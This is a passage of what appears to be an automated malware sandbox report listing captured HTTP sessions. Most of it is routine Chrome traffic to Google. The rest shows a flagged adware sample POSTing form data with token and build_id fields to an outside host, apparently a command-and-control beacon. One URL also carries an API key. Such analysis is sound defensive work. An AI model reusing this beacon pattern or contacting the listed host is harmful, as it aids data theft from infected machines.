                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2025-03-07 19:45:44 UTC1055INHTTP/1.1 200 OK
                                                                                    Version: 733468994
                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                    Accept-CH: Downlink
                                                                                    Accept-CH: RTT
                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                    Permissions-Policy: unload=()
                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                    Date: Fri, 07 Mar 2025 19:45:44 GMT
                                                                                    Server: gws
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Accept-Ranges: none
                                                                                    Vary: Accept-Encoding
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    2025-03-07 19:45:44 UTC323INData Raw: 32 30 38 39 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 46 61 20 67 62 5f 32 64 20 67 62 5f 50 65 20 67 62 5f 72 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                    Data Ascii: 2089)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                    2025-03-07 19:45:44 UTC1378INData Raw: 5c 75 30 30 33 64 5c 22 67 62 5f 6c 64 20 67 62 5f 70 64 20 67 62 5f 48 64 20 67 62 5f 6d 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 73 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4b 63 20 67 62 5f 52 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c
                                                                                    Data Ascii: \u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\
                                                                                    2025-03-07 19:45:44 UTC1378INData Raw: 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 39 63 20 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 62 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76
                                                                                    Data Ascii: span\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_xd gb_9c gb_ad\"\u003e\u003cspan class\u003d\"gb_vd\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_bd\"\u003e \u003c\/div
                                                                                    2025-03-07 19:45:44 UTC1378INData Raw: 30 30 33 64 5c 22 5f 74 6f 70 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32
                                                                                    Data Ascii: 003d\"_top\" role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_E\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-2
                                                                                    2025-03-07 19:45:44 UTC1378INData Raw: 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c
                                                                                    Data Ascii: -2,2 0.9,2 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,
                                                                                    2025-03-07 19:45:44 UTC1378INData Raw: 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 39 39 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 31 34 31 39 31 37 31 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65
                                                                                    Data Ascii: -label0","left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700299,3700949,3701384,101419171],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private
                                                                                    2025-03-07 19:45:44 UTC1124INData Raw: 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 43 64 3b 5f 2e 41 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 43 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 42 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e
                                                                                    Data Ascii: PDX-License-Identifier: Apache-2.0\n*/\nvar Cd;_.Ad\u003dfunction(a){const b\u003da.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Cd\u003dfunction(a){return new _.Bd(b\u003d\u003eb.substr(0,a.len
                                                                                    2025-03-07 19:45:44 UTC369INData Raw: 31 36 61 0d 0a 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 4e 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 6c 6c 3b 69 66 28 21 4d 64 29 72 65 74 75 72 6e 20 61 3b 74 72 79 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 63 5c 75 30 30 33 64 5c 75 30 30 33 65 63 3b 61 5c 75 30 30 33 64 4d 64 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 5c 22 6f 67 62 2d 71 74 6d 23 68 74 6d 6c 5c 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 62 7d 29 7d 63 61 74 63 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 50 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 4f 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75
                                                                                    Data Ascii: 16af(b,0)\u003d\u003d0};Nd\u003dfunction(){let a\u003dnull;if(!Md)return a;try{const b\u003dc\u003d\u003ec;a\u003dMd.createPolicy(\"ogb-qtm#html\",{createHTML:b,createScript:b,createScriptURL:b})}catch(b){}return a};_.Pd\u003dfunction(){Od\u003d\u003d\u
                                                                                    2025-03-07 19:45:44 UTC1378INData Raw: 38 30 30 30 0d 0a 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 51 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 48 5c 22 29 3b 7d 3b 5f 2e 55 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 54 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 56 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 45 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 45 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 48 5c 22 29 3b 65 6c 73 65 20 61
                                                                                    Data Ascii: 8000createScriptURL(a):a)};_.Sd\u003dfunction(a){if(a instanceof _.Qd)return a.i;throw Error(\"H\");};_.Ud\u003dfunction(a){if(Td.test(a))return a};_.Vd\u003dfunction(a){if(a instanceof _.Ed)if(a instanceof _.Ed)a\u003da.i;else throw Error(\"H\");else a
                                                                                    2025-03-07 19:45:44 UTC1378INData Raw: 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 67 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 7a 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f
                                                                                    Data Ascii: a)[0]:(c\u003ddocument,a?a\u003d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ge\u003dfunction(a,b){_.zb(b,function(c,d){d\u003d\u003d\"style\"?


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.449743142.250.186.684437376C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:44 UTC359OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                    Host: www.google.com
                                                                                    Connection: keep-alive
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: no-cors
                                                                                    Sec-Fetch-Dest: empty
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.449744142.250.186.684437376C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:44 UTC601OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
                                                                                    Host: www.google.com
                                                                                    Connection: keep-alive
                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJKhywEInP7MAQiFoM0BCL7VzgEIgNbOAQjB2M4BCMjczgEIiuDOAQiu5M4BCIvlzgE=
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: no-cors
                                                                                    Sec-Fetch-Dest: empty
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2025-03-07 19:45:44 UTC1303INHTTP/1.1 200 OK
                                                                                    Date: Fri, 07 Mar 2025 19:45:44 GMT
                                                                                    Pragma: no-cache
                                                                                    Expires: -1
                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Btx6n9RL09bD6W2iDDNwAQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                    Accept-CH: Downlink
                                                                                    Accept-CH: RTT
                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                    Permissions-Policy: unload=()
                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                    Server: gws
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Accept-Ranges: none
                                                                                    Vary: Accept-Encoding
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    2025-03-07 19:45:44 UTC75INData Raw: 33 39 66 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 77 20 70 6f 77 65 72 70 75 66 66 20 67 69 72 6c 73 20 6c 69 76 65 20 61 63 74 69 6f 6e 20 74 72 61 69 6c 65 72 22 2c 22 73 74 6f 63 6b 20 6d 61 72 6b 65 74 22 2c 22 6d 69 6e
                                                                                    Data Ascii: 39f)]}'["",["cw powerpuff girls live action trailer","stock market","min
                                                                                    2025-03-07 19:45:44 UTC859INData Raw: 6e 65 73 6f 74 61 20 68 69 67 68 20 73 63 68 6f 6f 6c 20 68 6f 63 6b 65 79 20 74 6f 75 72 6e 61 6d 65 6e 74 22 2c 22 73 75 70 72 65 6d 65 20 63 6f 75 72 74 20 63 6c 65 61 6e 20 77 61 74 65 72 20 61 63 74 20 72 61 77 20 73 65 77 61 67 65 22 2c 22 62 6c 6f 6f 64 20 6d 6f 6f 6e 20 74 6f 74 61 6c 20 6c 75 6e 61 72 20 65 63 6c 69 70 73 65 22 2c 22 70 73 35 20 6c 69 6d 69 74 65 64 20 65 64 69 74 69 6f 6e 20 63 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 70 6f 6c 61 72 20 76 6f 72 74 65 78 20 63 6f 6c 6c 61 70 73 65 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 22 2c 22 62 72 69 63 6b 20 62 79 20 62 72 69 63 6b 20 6a 6f 72 64 61 6e 20 34 20 72 61 66 66 6c 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f
                                                                                    Data Ascii: nesota high school hockey tournament","supreme court clean water act raw sewage","blood moon total lunar eclipse","ps5 limited edition controller","polar vortex collapse weather forecast","brick by brick jordan 4 raffle"],["","","","","","","",""],[],{"go
                                                                                    2025-03-07 19:45:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.449741142.250.186.684437376C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:44 UTC393OUTGET /async/newtab_promos HTTP/1.1
                                                                                    Host: www.google.com
                                                                                    Connection: keep-alive
                                                                                    Sec-Fetch-Site: cross-site
                                                                                    Sec-Fetch-Mode: no-cors
                                                                                    Sec-Fetch-Dest: empty
                                                                                    Sec-Fetch-Storage-Access: active
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2025-03-07 19:45:45 UTC970INHTTP/1.1 200 OK
                                                                                    Version: 733468994
                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                    Accept-CH: Downlink
                                                                                    Accept-CH: RTT
                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                    Permissions-Policy: unload=()
                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                    Date: Fri, 07 Mar 2025 19:45:44 GMT
                                                                                    Server: gws
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Accept-Ranges: none
                                                                                    Vary: Accept-Encoding
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    2025-03-07 19:45:45 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                    Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                    2025-03-07 19:45:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.44975195.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:48 UTC295OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----vsr1dj58gdtrim7gdj5x
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 505
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:48 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 76 73 72 31 64 6a 35 38 67 64 74 72 69 6d 37 67 64 6a 35 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 76 73 72 31 64 6a 35 38 67 64 74 72 69 6d 37 67 64 6a 35 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 76 73 72 31 64 6a 35 38 67 64 74 72 69 6d 37 67 64 6a 35 78 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------vsr1dj58gdtrim7gdj5xContent-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------vsr1dj58gdtrim7gdj5xContent-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------vsr1dj58gdtrim7gdj5xCont
                                                                                    2025-03-07 19:45:50 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:50 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:45:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.44975295.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:50 UTC295OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----gdtrqieuaai58yuaiwtj
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 493
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
